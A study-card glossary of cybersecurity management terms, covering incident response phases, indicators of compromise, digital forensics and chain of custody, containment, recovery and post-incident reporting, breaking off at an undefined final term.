Term
Configuration Management
Definition
Configuration management tracks and controls changes in a system's configuration. It is a critical component of security governance and often works as the cornerstone of systems management. Configuration management assists with planning, organizing, and controlling the development and maintenance of systems and services.
Configuration management helps security teams ensure that systems remain consistent, compliant, and secure. Organizations can ensure that their systems are up to date, reliable, and secure by implementing proper configuration management processes and tools. Configuration management also helps organizations maintain compliance with industry standards.
Term
Leadership and Management
Definition
Organizations are constantly growing, changing, and adapting, so leaders must be mindful of how this evolution impacts the cybersecurity program. Generally, as the organization changes, so must its security approaches and capabilities. Often, security teams and organizational leaders work independently from each other. This is a risk because the leadership teams may make decisions about operations that severely impact the environment's security. Likewise, when security teams work independently of operations teams, they may not fully comprehend the impacts their security-focused decisions have on staff productivity.
A classic example is merger and acquisition activity. When one organization acquires another, each organization may have different approaches to security. Leadership teams will be eager to integrate systems to streamline operations and reduce operating costs.
In contrast, security teams may push back on integration efforts until after security assessments and issue remediation activities are complete. Another example is changing business requirements stemming from new partnerships. A security team that has successfully managed security operations for many years may discover that they are subject to many new rules when the organization starts working with a defense contractor with stringent supply chain controls.
Term
memorandum of understanding (MoU)
Definition
Usually a preliminary or exploratory agreement to express an intent to work together that is not legally binding and does not involve the exchange of money.
A memorandum of understanding (MoU) is a legal document that outlines the terms and conditions of an agreement between two or more parties. It is an agreement that is not legally binding but serves as a document of understanding and good faith among the parties involved. A memorandum of understanding usually outlines the agreement's objectives and each party's duties and responsibilities.
The main purpose of a memorandum of understanding is to ensure that all parties involved in the agreement understand each other's expectations and obligations. It serves as a clear guide to the parties involved and helps ensure everyone is on the same page. It also serves as a reference point for the parties to use in a dispute.
Once the memorandum of understanding is signed, it is considered a binding document. Both parties must understand the terms and conditions of the agreement and make sure to adhere to its provisions. The memorandum of understanding should also be reviewed and updated regularly to ensure that everyone is still in agreement with the terms of the agreement.
An MoU might outline uptime, data access, response times, and other performance or access characteristics that conflict with the changes or maintenance tasks identified in response to mitigating vulnerabilities.
Term
service-level agreement (SLA)
Definition
Operating procedures and standards for a service contract.
A service-level agreement (SLA) is a legally binding contract between two or more parties that defines the level of service to be provided by one party to another. It often governs the relationship with a third-party service provider. It outlines the services provided, the terms of service, the responsibilities of each party, and the penalties for failing to meet them. It is essential to have a service-level agreement in place when providing any service, as it serves to protect both parties and helps to manage expectations.
The service-level agreement should detail the services to be provided, including the quality of service, the response time, the cost, and other relevant information. It should also specify the time frame for the service delivery, the contact information for both parties, and the payment terms. It should also define the performance metrics used to measure the quality of the service.
Term
Organizational Governance
Definition
Organizational governance is the system of rules, practices, and processes an organization uses to control its operations and the strategic direction it pursues. It defines the roles and responsibilities of the board of directors, management, and other stakeholders in achieving the organization's objectives. Organizational governance aims to ensure that the organization is well managed, accountable, and compliant with applicable regulatory requirements. It also helps to ensure that the organization is guided by a set of values and principles consistent with its mission and objectives.
Organizational governance begins with the board of directors. The board of directors is responsible for setting the organization's overall direction, setting policies and procedures, and overseeing the organization's management. The board of directors is also responsible for setting the prevailing standards for organizational governance, such as selecting leaders, creating ethics policies, establishing a code of conduct, and monitoring operational performance.
In addition to the board of directors, other stakeholders, including shareholders, regulators, and the public, are involved in organizational governance. Shareholders are responsible for ensuring that the organization is accountable to them and that their investments are responsibly managed. Regulators ensure that the organization complies with applicable laws and regulations. The public is responsible for holding the organization accountable for its actions and ensuring that it follows its mission and objectives.
The dynamics and pressures of organizational governance often overshadow security initiatives. When new investments in security tools and software have high costs or security teams want to slow down operations to perform security evaluations and other similar activities, the board of directors may push back and override these plans. Security initiatives can often disrupt existing strategic plans, cause conflicts in the governance board, and upset stakeholders.
Term
Business Process Interruption
Definition
A business process interruption describes a disruption in an organization's normal operations. Disruptions can cause minor or significant impacts. Events such as natural disasters, power outages, technical glitches, human error, breaches, or cyberattacks, can cause business process interruptions. The interruption can affect any aspect of an organization's operations, from product and service delivery to internal operations and customer service.
Business process interruptions can significantly impact a business's bottom line. Financial losses can occur due to lost revenue, increased costs, and missed opportunities. Furthermore, interruptions can negatively impact customer service, employee morale, and brand reputation. The costs of a business process interruption can be far-reaching, with the potential to cause long-term damage to a company's reputation and profitability.
Term
Degraded Functionality
Definition
Degraded functionality is an issue that often arises in software and hardware. It occurs when system performance decreases due to various factors, such as environmental changes, age, lack of maintenance, and sometimes from applying security patches. It can also result from a design flaw, lack of resources, or inadequate testing.
Degraded functionality causes employee frustration, decreased efficiency, reduced performance, and increased costs due to repairs and replacements. Furthermore, it can cause safety issues due to the system's inability to perform as required.
Term
Legacy Systems
Definition
Legacy systems are outdated systems or software applications that have been in use for an extended period. Legacy systems are built on obsolete technologies and struggle to keep up with changing technological trends. As such, these systems often need significant help to meet modern security requirements, if that is even possible. Despite this, many organizations still rely on legacy systems and are reluctant to replace them due to the cost and complexity associated with the transition.
Legacy systems are rarely updated and often contain code that is difficult to maintain. As such, they are often vulnerable to security threats. Moreover, these systems often lack the ability to integrate with newer platforms, which is a significant problem for organizations that need to grow and adapt their capabilities to changing operating requirements.
Modernizing legacy systems is frequently daunting, and upgrades require significant time, money, and resources to migrate data and make changes to the code.
Term
Proprietary Systems
Definition
Proprietary systems are specialized systems designed to serve a specific purpose and are tailored to an organization's needs. Proprietary systems can range from simple software programs to complex networks and databases. A company or organization often develops proprietary systems to provide a unique solution to a specific problem or challenge. They are often developed in-house, with the organization's staff, rather than using outside vendors. This allows the organization to control the system and ensure it meets its specific needs. In-house developed software depends on the skill and productivity of its own developers.
When security vulnerabilities are identified in these systems, they often create overwhelming trouble for in-house teams. Security changes are often complicated and depend on the application's architectural structure. Poor architectural design choices made early in development can create huge problems when security changes are needed.
Term
Incident response plans (IRP)
Definition
Specific procedures that must be performed if a certain type of event is detected or reported.
Term
Preparation Incident response plans (IRP)
Definition
Make the system resilient to attack in the first place. This includes hardening systems, writing policies and procedures, and setting up confidential lines of communication. It also implies the creation of incident response resources and procedures.
Term
Detection and Analysis Incident response plans (IRP)
Definition
Determine whether an incident has taken place and assess how severe it might be (triage), followed by notification of the incident to stakeholders.
Term
Containment Incident response plans (IRP)
Definition
Limit the scope and magnitude of the incident. The principal aim of incident response is to secure data while limiting the immediate impact on customers and business partners.
Term
Eradication and Recovery Incident response plans (IRP)
Definition
Once the incident is contained, the cause can be removed and the system brought back to a secure state. The response process may have to iterate through multiple phases of detection, containment, and eradication to effect a complete resolution.
Eradication and Recovery Phase:
·Remove causes of incident from hosts and networks.
·Sanitize infected media devices.
·Reconstruct/reimage hosts.
·Reconstitute hosts and services.
·Re-secure hosts and networks (patching, permissions, logging, hardening).
Analyze the incident and responses to identify whether procedures or systems could be improved. It is imperative to document the incident. This phase is very commonly referred to as lessons learned. The outputs from this phase feed back into a new preparation phase in the cycle.
Post-incident Activity Phase:
·Prepare incident summary reports for stakeholders.
·Conduct lessons learned/after action meeting.
·Create after action report with summary and recommendations.
Post-incident Feedback Informs Preparation:
·Implement recommendations from lessons learned.
·Improve incident response policies, procedures, and resources.
Term
Incident Response Policies
Definition
Statements of the organization's expectations and procedures for responding to security incidents. These policies typically describe which incident types must be reported and should provide detailed descriptions of the steps to be taken in the event of an incident, the roles and responsibilities of those involved, and the communication protocols to be followed. The organization should also develop a timeline for responding to incidents, including the timeline for reporting and responding to them. It should also include a timeline for determining the cause of the incident, the recovery process, and the steps to prevent similar incidents in the future.
Term
Incident Response Procedures
Definition
Describe organizations' actions during incident response. These procedures include the protocols for how different parts of the organization work together to mitigate incidents and the procedures for how individuals should respond.
Term
Ransomware
Definition
A ransomware playbook describes the people, processes, and tools to be employed during such an event and should include considerations for determining which systems were impacted, methods by which impacted systems can be immediately isolated, and identification of and engagement with the people needed in the response. Ransomware responses should include disconnecting and isolating networks as quickly as possible. It is preferable to disconnect systems rather than power them off, both to maintain forensic integrity and to preserve the possibility of extracting cryptographic keys from system memory, which can be used for remediation.
Term
Data Exfiltration
Definition
Used in response to an adversary that has targeted, copied, and transferred sensitive data. Data exfiltration can use many avenues, from the literal movement of data files to less obvious methods such as an SQL injection attack. Data exfiltration playbooks include the specific and necessary tasks needed in response to data exfiltration, including notification requirements and system and network forensic analysis to determine exactly what was accessed. Sometimes analysis can reveal the locations where data was copied, which can help in response decisions. Deleting copies of data on an adversary's system is considered to be a hack-back action, and (ironically) probably illegal. Regardless, deleting data in this way provides only limited mitigation, depending on whether additional copies of the data exist in other locations.
Term
Social Engineering
Definition
A social engineering playbook often involves responses in relation to an identified phishing email. As soon as a suspicious email is identified, an official notice should be broadcast to advise of the attack and to encourage others who may have responded to the email to step forward. In parallel, the phishing email should be searched for within the entire email system to identify any other instances, and any elements within the email (such as dynamic body content, hyperlinks, and/or attachments) should be analyzed within a sandbox to fully understand what the message is designed to do. Information extracted from sandbox analysis can be used to feed security infrastructure, such as by blocking access to IP addresses and URLs and by crafting updated detection rules in IDS, AV, etc. At a bare minimum, impacted individuals should have their passwords reset and possibly also have their desktop systems replaced.
Term
Incident Response Tools and Resources
Definition
These describe the wide range of specialized tools needed during an incident response.
Security Information and Event Management (SIEM)—Collect and analyze log data, provide a single viewpoint for logs collected from many sources. Help to locate specific events or event sequences.
Intrusion Detection Systems (IDS)—Provide alerts when suspicious events occur based on established signatures or custom-crafted signatures developed to locate events specific to an incident.
Vulnerability Scanners—Identify the presence of a vulnerability, especially one under active attack; can also provide assurance that a previously identified vulnerability has been remediated.
Netflow Analyzers—Provide high-level visibility into the volumes of traffic and protocols in use in the environment.
Infrastructure Monitoring—Tools used to monitor availability, latency, capacity, and other elements. Typically associated with engineering teams and used to ensure the health and uptime of infrastructure components such as servers, storage environments, and network equipment.
Proxies and Gateways—Firewalls, routers, and forward proxies (Internet traffic) provide valuable insight into traffic leaving and entering the network. These can be used to alert on specific traffic or analyzed to locate historical events.
Term
Identification of Potential Threats and Incidents
Definition
Threat modeling, risk analysis, and other threat identification activities can help organizations identify potential threats and incidents that could impact the organization. Incident types include cyberattacks, natural disasters, and other events that could disrupt normal operations. Threat modeling tools can help organizations create threat models and analyze identified threats and incidents comprehensively by creating detailed diagrams that support team collaboration.
Term
Assessment of Potential Impacts
Definition
Organizations use risk analysis and impact assessments to measure the scope of identified incidents on the organization. Risk analysis tools include guided questionnaires and templates designed to help individuals collect information and produce detailed reports on their findings.
Term
Creation of Response Plans
Definition
Organizations create response plans to handle incidents based on the threats and incidents identified during risk assessment activities. Response plans should leave little to the imagination. They should be concise and direct, with detailed steps and clear expectations. Flowcharts are a popular tool in the incident response arsenal.
Term
Testing of Response Plans
Definition
Organizations test response procedures to ensure that personnel know how to respond to specific incidents and that the responses are effective.
Term
Tabletop Exercises
Definition
Tabletop exercises are a type of incident response planning activity that does not involve a mock incident or full incident simulation. During tabletop exercises, organizations bring together the personnel who would respond to an incident, often in a simulated setting, to test the effectiveness of their communication and response plans.
Term
Mock Incidents
Definition
Scenario-based simulations that organizations create to test how the incident response plan actually works in practice. Mock incidents can include simulations of different types of incidents that might occur, such as earthquakes or malicious cyberattacks.
Term
Full incident simulations
Definition
Mock incidents that include the full set of people and organizations involved in responding to an incident, to test the entire response process, including communication protocols and the effectiveness of the different response teams.
Term
Antimalware software
Indicators of compromise (IoCs)
Definition
An alert is generated when a virus signature is detected on a host system.
Term
Network intrusion detection system/network intrusion prevention system (NIDS/NIPS)
Indicators of compromise (IoCs)
Definition
An alert is generated after an automated port scan is detected.
Term
Host intrusion detection system/host intrusion prevention system (HIDS/HIPS)
Indicators of compromise (IoCs)
Definition
An alert is generated after the cryptographic hash of an important file no longer matches its known, accepted value.
Term
System logs
Indicators of compromise (IoCs)
Definition
Entries in the Windows event log indicate a log-on with new credentials that was allocated special privileges.
Term
Network device logs
Indicators of compromise (IoCs)
Definition
An entry in the firewall log indicates a dropped connection intended for a blocked port.
Term
Security information and event management (SIEM)
Indicators of compromise (IoCs)
Definition
An alert is generated if anomalous behavior is detected in any relevant logs.
Term
Flow control device
Indicators of compromise (IoCs)
Definition
A higher amount of traffic than normal across the network indicates an attempted denial of service (DoS) condition.
Term
Internal personnel
Indicators of compromise (IoCs)
Definition
Employee testimony indicates a possible breach in progress.
Term
People outside the organization
Indicators of compromise (IoCs)
Definition
An external party's claim of responsibility for an attack indicates that this is the case.
Term
Cyber-threat intelligence (CTI)
Indicators of compromise (IoCs)
Definition
Third-party research and vulnerability database information indicates a new threat that could be targeting your organization.
Term
Triage Event
Definition
Properly determining the scope of a security incident occurs during triage. Triage work is dependent upon the skills and knowledge of the individuals performing the work and includes careful curation of the data and tools useful in locating any indicators of compromise. Individuals performing this work should have specialized training and experience in live system and digital forensics as well as memory and malware analysis.
Triage work is often performed on endpoints, within executable and binary files, and using enterprise security infrastructure tools such as SIEM. Ultimately, triage work is focused on determining a timeline of what, where, how, and when events occurred.
Having clearly defined processes, thresholds, and notification procedures in place as part of a security incident pre-escalation plan is imperative to rapid response. The lack of a clear plan regarding what constitutes an urgent situation or knowledge of what to do when a situation is identified will result in problems being stuck in ticket queues or bogged down in bureaucracy while an adversary furthers the impacts of their attack.
Term
playbooks
Definition
A checklist of actions to perform to detect and respond to a specific type of incident.
Incident response playbooks are an invaluable tool for organizations to quickly and efficiently respond to security incidents. With an incident response playbook, organizations define the steps they need to take to respond to a security incident, such as the specific roles, processes, and procedures that security staff must follow. Incident response playbooks also guide communication with stakeholders and the public, as well as guide how to gather evidence and determine the incident's root cause.
Oftentimes the playbook is just that—a physical book used by a security analyst in response to an incident. Using a physical book ensures its availability during a wide-scale incident. In a highly secure environment, it also ensures the IR capabilities are not digitally exfiltrated by the attackers.
The most effective incident response playbooks are tailored to an organization's specific security needs and provide detailed guidance on responding to various security incidents. For example, a playbook may contain detailed instructions on responding to a ransomware attack or a data breach. Additionally, the playbook should include guidance on the necessary steps to contain the incident, such as isolating affected systems, and measures to ensure the incident is fully resolved.
When creating an incident response playbook, organizations should ensure they have the right level of detail and that all necessary stakeholders are involved, including security teams, IT staff, legal teams, and other personnel who may be involved in responding to the incident. Organizations should update the incident response playbook as new threats and technologies emerge.
Term
Communication Plan
Definition
A secure method of communication between the IR team members is essential for successfully managing incidents. The team may require "out-of-band" or "off-band" channels that attackers cannot intercept. In a major intrusion incident, using corporate email or VoIP runs the risk that the adversary can intercept communications. One obvious method is via smartphones, but ideally, the messaging system should support end-to-end encryption, digital signatures, and encryption keys supplied by a system independent of the identity and access management systems used by the attacked environment.
Term
Forensic Process
Definition
Incident investigation requires analysis techniques designed to reveal the details of what happened. Forensic techniques are a critical component of the investigation. Broadly, forensic techniques look closely at the inner workings of devices, operating systems, and applications to reveal a detailed sequence of events. A sequence of events supported by forensic analysis helps the IR team improve the response to future incidents.
Digital forensics is highly specialized and complicated work, and entire books and certification exams are devoted to the topic. Regarding incident response, it is important to understand that the forensic process supports an investigation by providing specific details regarding an event.
Term
Lessons Learned
Definition
An analysis of events that can provide insight into how to improve response and support processes in the future.
Term
Incident Response Plan Update
Definition
The conclusions of the lessons learned report should drive changes to incident response. This might involve small tweaks to procedures, better explanations or greater clarity for incident handlers, new templates for communicating with trusted parties, or major changes to the security controls used. Updates to incident response procedures require updated training and testing programs.
Term
business continuity (BC)
Definition
A collection of processes that enable an organization to maintain normal business operations in the face of some adverse event.
In short, business continuity (BC) describes the efforts the organization takes to keep the organization running during and after a disaster event. It describes how the organization continues to operate in the face of significant adversity and the effort needed to work through the event and then restore operations to normalcy. Bringing systems back online is part of the objective; returning things back to normal takes more time. For example, employees may need to complete or track work using alternative methods during a disaster. At some point, that information will need to be entered into the systems that were unavailable during the disaster. If the organization had to operate out of an alternative facility, all of the people and equipment will need to move back after the event passes. These activities are part of the business continuity plan.
Term
Disaster recovery (DR)
Definition
A documented and resourced plan showing actions and responsibilities to be used in response to critical incidents.
Disaster recovery (DR) is a component of an overall business continuity plan. Disaster recovery plans focus on the immediate needs of a disaster when things are the most frantic and pressing. The tasks required to bring critical systems back online are the most crucial issue—for example, recovering systems after a wide-scale ransomware infection. Disaster recovery describes the efforts taken to restore infected systems to a safe operating state.
Term
summary list of some common indicators of compromise
Definition
·Atypical or unusual inbound and/or outbound network traffic
·Administrator, root, or other highly privileged accounts being used in any unexpected way
·Any account activity representing access or actions which should not be possible using the identified account
·A high volume of invalid password entries
·Unexpected increases in traffic volumes, especially database or DNS traffic
·High volumes of requests to access a single file
·Suspicious changes to the Windows registry or any unusual change to system files
·Atypical requests to Domain Name Servers (DNS) or strange domain name resolution requests
·Any unauthorized changes to system settings and/or mobile device profiles
·Large quantities of compressed files stored in unexpected locations
·Traffic originating from countries where the organization does not operate or have any business dealings
·Any strange or unknown applications running on a system
·Any unknown or suspicious scheduled tasks
·Strange or unknown processes running on a system
·Strange or unknown services installed on a system
·Alerts from IDS/IPS, firewalls, endpoint protection, or any other security tools
·Any unexpected instances of encrypted files
·Any activity on a system that indicates remote access/control that is not expected
Term
digital forensics
Definition
The process of gathering and submitting computer evidence for trial. Digital evidence is latent, meaning that it must be interpreted. This means that great care must be taken to prove that the evidence has not been tampered with or falsified.
Term
Identification
digital forensics
Definition
• Ensure that the scene is safe. Threat to life or injury takes precedence over evidence collection.
• Secure the scene to prevent contamination of evidence. Record the scene using video and identify witnesses for interview.
• Identify the scope of evidence to be collected.
Term
2. Collection
digital forensics
Definition
• Ensure authorization to collect the evidence using tools and methods that will withstand legal scrutiny.
• Document and prove the integrity of evidence as it is collected and ensure that it is stored in secure, tamper-evident packaging.
Term
3. Analysis
digital forensics
Definition
• Create a copy of evidence for analysis, ensuring that the copy can be related directly to the primary evidence source. The integrity of evidence copies is verified by generating hashes of the files on a recurring basis in order to detect any unintended changes.
• Use repeatable methods and tools to analyze the evidence.
• Analyze evidence using tools which are known to produce trustworthy and legally defensible results. A list of tested forensic tools is available from NIST at https://www.nist.gov/itl/ssd/software-quality-group/computer-forensics-tool-testing-program-cftt.
Term
Reporting/Presentation
digital forensics
Definition
• Create a report of the methods and tools used and present findings and conclusions in accordance with the specific reporting requirements necessary (and dependent upon the type of incident).
Term
Data Acquisition
Definition
Data acquisition describes obtaining a forensically clean copy of data from a device held as evidence. Data acquisition often requires specialized software or equipment to create a disk image from the target device. The image can copy volatile or nonvolatile storage, and a system memory snapshot (memory dump) is also often created to aid in later analysis. Evidence capture prioritizes collection activities based on the order of volatility, initially focusing on highly volatile storage.
Term
Order of Evidence Collection
Definition
CPU registers and cache memory (including cache on disk controllers, GPUs, and so on)
Contents of system memory (RAM), including the following:
Routing table, ARP cache, process table, kernel statistics
Temporary file systems/swap space/virtual memory
Data on persistent mass storage devices (HDDs, SSDs, and flash memory devices)—including file system and free space
Remote logging and monitoring data
Physical configuration and network topology
Archival media
Term
Evidence Preservation
Definition
The host devices and media taken from a crime scene should be labeled, bagged, and sealed using tamper-evident bags. It is also appropriate to ensure that the bags have antistatic shielding to reduce the possibility of data being damaged or corrupted on the electronic media by electrostatic discharge (ESD). Each piece of evidence should include a chain of custody form that records where, when, and who collected the evidence, who subsequently handled it, and where it was stored.
The evidence should be stored in a secure facility with physical access and environmental controls, so that condensation, ESD, fire, and other hazards do not damage the electronic evidence. Similarly, transport methods must also be secure if the evidence is moved.
Data validation techniques are essential for digital evidence, such as mass storage devices. Hashing is used to validate data integrity. For example, forensic analysts will generate the hash value of a disk drive before performing any analysis. The hash is extremely important because it allows a forensic analyst to make copies of evidence and prove the copies are exact. By comparing the hash values of the original evidence to the forensic copy, the analyst can confirm they are identical (so long as the values are the same). By regenerating the hash periodically, a forensic examiner can prove that evidence has not been modified during analysis.
Term
chain of custody
Definition
Record of evidence-handling from collection to presentation in court to disposal.
The chain of custody is the record of evidence handling from collection through presentation in court. The evidence can be hardware components, electronic data, or telephone systems. The chain of custody documentation reinforces the integrity and proper custody of evidence from collection, to analysis, to storage, and finally to presentation. When security breaches go to trial, the chain of custody protects an organization against accusations that evidence has either been tampered with or is different than it was when it was collected. Every person in the chain who handles evidence must log the methods and tools they used.
Term
legal hold
Definition
A process designed to preserve all relevant information when litigation is reasonably expected to occur.
A legal hold, or litigation hold, describes the notification received by an organization's legal team instructing them to preserve electronically stored information (ESI) and/or paper documents that may be relevant to a pending legal case. Legal hold authority can be complicated by jurisdiction, but these details are managed by legal teams. It is imperative that the cybersecurity team be notified of legal holds as soon as possible in order to ensure data is preserved in accordance with the order. Legal hold requirements often exceed the data protection and retention periods ordinarily in place.
Term
e-Discovery
Definition
Procedures and tools to collect, preserve, and analyze digital evidence.
e-Discovery describes the electronic component of identifying, collecting, and providing the electronically stored information (ESI) identified by a legal hold. The scope of information included in e-Discovery can be vast and include everything from files, emails, logs, text messages, voicemail, databases, and social media activity. The scope of information requested in an e-Discovery request can be difficult for many organizations to comply with. For organizations that are involved in regular legal activities, generally large organizations and government, specific strategies are often employed to defend against e-Discovery requests. Defenses often include well-crafted data retention policies that define stringent periods for which data can be retained. However, data retention policies cannot conflict with existing laws that dictate retention periods.
Term
Organization Impact versus Localized Impact
Definition
The scope of an incident is a straightforward way of assessing its impact. A localized impact means that the scope is limited to a single department, small user group, or one or two systems. An organization impact is one that affects mission essential functions, meaning that the organization cannot operate as intended. Along with the scope, the duration of the impact will have a substantial effect on costs. From the perspective of incident response, the scope and duration of an event might not be obvious. It is important to reevaluate the impact as new facts emerge and to be prepared to escalate response procedures if the scope or duration seem likely to expand.
Term
Immediate versus Total Impact
Definition
Immediate impact refers to direct costs incurred because of an incident, such as downtime, asset damage, fees, penalties, and other costs. Total impact relates to costs that arise following the incident, including damage to the company's reputation and brand value.
Term
Containment
Definition
Isolation is a mitigation strategy applied to many incident types. Isolation involves removing an affected component from the environment in which it participates—for example, removing a server from the network after it has been attacked or disabling a router interface to prevent the spread of malware outside of a department. Isolation could also refer to disabling a user account or application service.
The chosen isolation method directly impacts forensic analysts and can potentially violate established policies or SLAs. Selecting the right approach to containment depends upon balancing these requirements with the risks associated with inaction. Incident responders must carefully document and timestamp all actions to support post-incident investigations.
• Ensure the safety and security of all personnel. The first concern of all managers involved with the security response is the safety and security of personnel.
• Prevent further damage. This will be the overriding priority after the identification of the compromise.
• Identify whether the intrusion is a primary or a secondary attack (part of a more complex campaign).
• Avoid alerting the attacker that they have been discovered.
• Preserve forensic evidence of the intrusion. While waiting for the forensics analyst to arrive, treat the system like any crime scene by preventing anyone from further compromising the system or destroying evidence.
Term
Reimaging
Definition
One method of restoring a system after a breach or infection is reimaging it using a known clean backup or disk image created before the incident. A "clean" backup or image has appropriate secure baseline configurations, is fully patched, and does not contain malware. Depending on when the system was initially breached, backups may contain malware, backdoors, or other artifacts which would allow the attacker to regain access quickly. Any system infected with malware should be reimaged instead of trusting that antimalware tools can effectively "clean the infection." Malware is complicated and stealthy, and removal is often a complex task.
Term
Recovery
Definition
Eradicating malware, backdoors, and compromised accounts from individual hosts is not the last step in incident response. You should also consider a recovery phase (or sub-phase) where the goal is restoration of capabilities and services. This means that hosts are fully reconfigured to operate the business workflow they were performing before the incident. The steps you take to recover from an incident will depend greatly on the nature of the incident, as well as the ways in which you prepared for such an incident. The following are some examples of incident recovery:
• If a malicious user deletes data from a database, you can restore that data if you had been creating backups. A continuous 1:1 replication of that data will require minimal effort on your part, but backups made in time intervals may leave some data incomplete or irrecoverable. If possible, identify what you can about the data that was lost in the period since the last backup was performed.
• If a distributed denial of service (DDoS) takes down your web servers, you may need to manually reboot your servers and perform a health check on them before pushing them back to live status. They should accept incoming connections gradually rather than all at once to prevent the servers from overloading again. If you identified the source or sources of the malicious traffic, you can also have the servers filter them.
• If an employee accidentally downloads malware onto their workstation, you can attempt to remove it with antimalware software. If the malware persists, you may need to wipe the entire hard drive and reinstall the operating system. You can only truly recover once the malware is completely gone from the system, and the user is trained to be more security aware.
An essential part of recovery is the process of ensuring that the system cannot be compromised through the same attack vector (or failing that, that the vector is closely monitored to provide advance warning of another attack).
Term
Remediation
Definition
Remediation describes the corrective actions taken to address a problem or issue permanently. This often involves replacing faulty hardware or software or implementing new procedures to prevent similar issues from occurring in the future. Remediation requires using the outputs of root cause analysis to correctly identify the fix that prevents the issue from happening again. This is significantly different from "fixing," which focuses on simply making things work again.
For example, if an attack used a software or firmware exploit, the target system (and other systems with the same vulnerability) must be patched (if a patch exists). Root cause analysis would seek to determine why the systems were unpatched in the first place and how the attack was able to access the vulnerable systems. So while recovery efforts focus on restoring things back to normal, remediation describes how lessons learned and root cause analysis are incorporated into policies, procedures, and technological improvements to ensure the problem does not reoccur.
Term
Compensating Controls
Definition
A compensating control serves the same purpose as the recommended control and affords the same (or better) level of protection but uses a different methodology or technology. Leadership must approve the control's deployment and require detailed documentation to show that the compensating control is deployed as part of the process, is applied consistently by employees, and is monitored for effectiveness.
The need for a compensating control may be because the primary control is too expensive, needs more qualified staff to operate it, or is incompatible with a critical application or platform.
Term
Stakeholder Management
Definition
Stakeholders describe any individual, group, or organization that can affect, be affected by, or perceive itself to be affected by a decision, activity, or outcome relating to an incident. Identifying stakeholders is the first step toward successful stakeholder management, as they are not always obvious. It is vital to identify, analyze, and prioritize stakeholders' perspectives, expectations, and interests. These will dictate the communication methods and the content of the message.
After identifying stakeholders, it is essential to develop effective communication strategies to address their needs and interests. Building strong relationships with stakeholders is crucial and is accomplished by providing accurate and timely information, listening to feedback, and responding to requests. Effective communication helps to manage expectations, resolve conflicts, and foster collaboration.
Regular communication with stakeholders should be part of the incident response process to ensure they know the status of the incident. The method of communication depends upon the stakeholder and could include face-to-face meetings, emails, text/chat messages, telephone calls, or video conferencing. Incidents impact stakeholders, and their areas of responsibility may be shaped by their knowledge of the incident. Keeping stakeholders informed helps them manage their responsibilities (affected by the incident) and often reveals information the responders may not have previously known, such as alternative processes, business relationships, impacts, and consequences.
Term
Incident Declaration and Escalation
Definition
Incident declaration and escalation are critical components of incident response. It is the process of recognizing and officially declaring an event as an incident, as well as the process of escalating the incident to the appropriate personnel.
The first step in incident declaration and escalation is identifying an incident, such as recognizing a potential security event and confirming that it constitutes a verified security incident. The category of "incident" is broad and includes everything from full-scale data breaches to something as simple as a protected document printed inappropriately.
After identifying and confirming a security incident, the next step is the official declaration of the event as an incident. Incident declaration includes documenting the incident details, including its severity, and notifying the appropriate personnel via escalation procedures.
Depending on the type of incident, there may be multiple escalation levels. For instance, in a data breach, the incident may need to be escalated to executive management. Alternatively, if the incident is an attempted intrusion, it may need to be escalated to IT staff or a security operations center. An incident must be declared or escalated to the appropriate personnel for it to be properly addressed. Unaddressed incidents will likely result in significant future issues, jeopardizing the organization's security.
Term
Data exfiltration
Definition
The process by which an attacker takes data that is stored inside of a private network and moves it to an external network.
Term
Insider Data Exfiltration
Definition
An employee or ex-employee perpetrates the attack using access permissions provided as part of their job.
Term
Device Theft/Loss
Definition
A device is lost or stolen. Even with encryption and strong authentication protecting it, device theft/loss must be treated as a suspected breach.
Term
Accidental Data Breach
Definition
Human error or a misconfiguration leads to data being made public or sent to unauthorized recipients. This scenario has occurred more frequently as organizations use public cloud storage platforms for data.
Term
Integrity/Availability
Definition
Most data breaches impact the confidentiality of the information. Attacks that compromise the availability (destruction of systems-processing data) and integrity (modification of database records, for instance) are also likely to require regulatory notification and reporting.
Term
executive summary
Definition
A part of the written report that is a high-level and concise overview of the penetration test, its findings, and their impact.
The executive summary should provide a brief overview of the document, including the purpose, key points, and conclusion. It should include relevant background information to provide context for the rest of the document. It is important to remember to include the main points in the executive summary to ensure that readers can understand the report without having to read the entire document. The executive summary should be clear and concise but still provide enough detail to give readers a good understanding of the report's contents.
An executive summary should be tailored to its audience and written in a way that will be accessible to them. When writing an executive summary, it is crucial to be specific and concise. Keep in mind the length limit of the executive summary and avoid adding unnecessary detail. An executive summary should be written in a professional tone and should not contain any opinion or bias.
Term
timeline
Definition
In digital forensics, a tool that shows the sequence of file system events within a source image in a graphical format.
A timeline of events is designed to provide a chronological sequence of significant events or dates visualized in a graph or chart format.
Term
Impact
Definition
Impact describes how a security incident affects an organization's operations, data, personnel, or reputation and is typically measured in terms of costs, downtime, loss of customer trust, or other factors.
Term
Scope
Definition
The scope is an assessment of the potential impact of an incident. It identifies the magnitude of the incident and the resources needed to restore services. It operates as a measure to guide the prioritization and management of the resources necessary to ensure an efficient response.
Term
Evidence
Definition
Incident evidence is any information collected during the investigation that can provide clues to help identify the attack and explain the circumstances surrounding it. Physical evidence, log data, forensic reports, witness statements, surveillance footage, and audio recordings are all examples of evidence.
Term
Recommendations
Definition
Incident response recommendations include details regarding what to do in response to the incident. Some of the suggestions will be in direct response to containing the immediate damage, but others may focus on longer-term objectives. The recommendations must be specific and actionable, and the decisions made in response to them must be measured and tracked to demonstrate their successful completion.
Some examples of recommendations may include the following:
• Replace outdated desktops.
• Add additional licensed features to a security product.
• Remove access permissions to specific assets.
• Prohibit the use of personal devices.
• Increase security awareness training frequency.
• Change specific elements of the patch management policy.
• Prohibit access to specific websites.
• Monitor user activity in additional ways.
• Disable specific types of accounts.
• Reset passwords.
• Implement multifactor authentication (MFA).
Lessons learned and after-action reports are valuable sources of information to identify recommended changes. It could be that the teams responsible for incident response were slow to act, made mistakes, or needed to be more coordinated. Recommendations should address these problems, and leadership teams need to identify ways to measure improvements and provide assurance that changes are incorporated. Response time and mean time to recover are popular measures used to evaluate the effectiveness of incident response teams. When response and recovery times show a downward trend, this generally implies improvements but requires complete analysis.
Term
Root cause analysis
Definition
A technique used to determine the true cause of the problem that, when removed, prevents the problem from occurring again.
Root cause analysis is an investigative technique used to identify the underlying cause of a problem. It is a systematic process used to determine the most fundamental cause of a problem and its consequences. This process is used to identify what went wrong and why and then take corrective action to prevent similar issues from occurring.
One cannot overemphasize the importance of root cause analysis, which is foundational to understanding why an event occurred. On the surface, a computer may be infected with malware, but the root cause is much deeper. Why and how the computer was infected strikes at the center of the problem and may reveal user awareness issues, insufficient content filtering, ineffective patch management, improperly provisioned user accounts, or numerous other issues.
Term
Mean Time to Detect
Definition
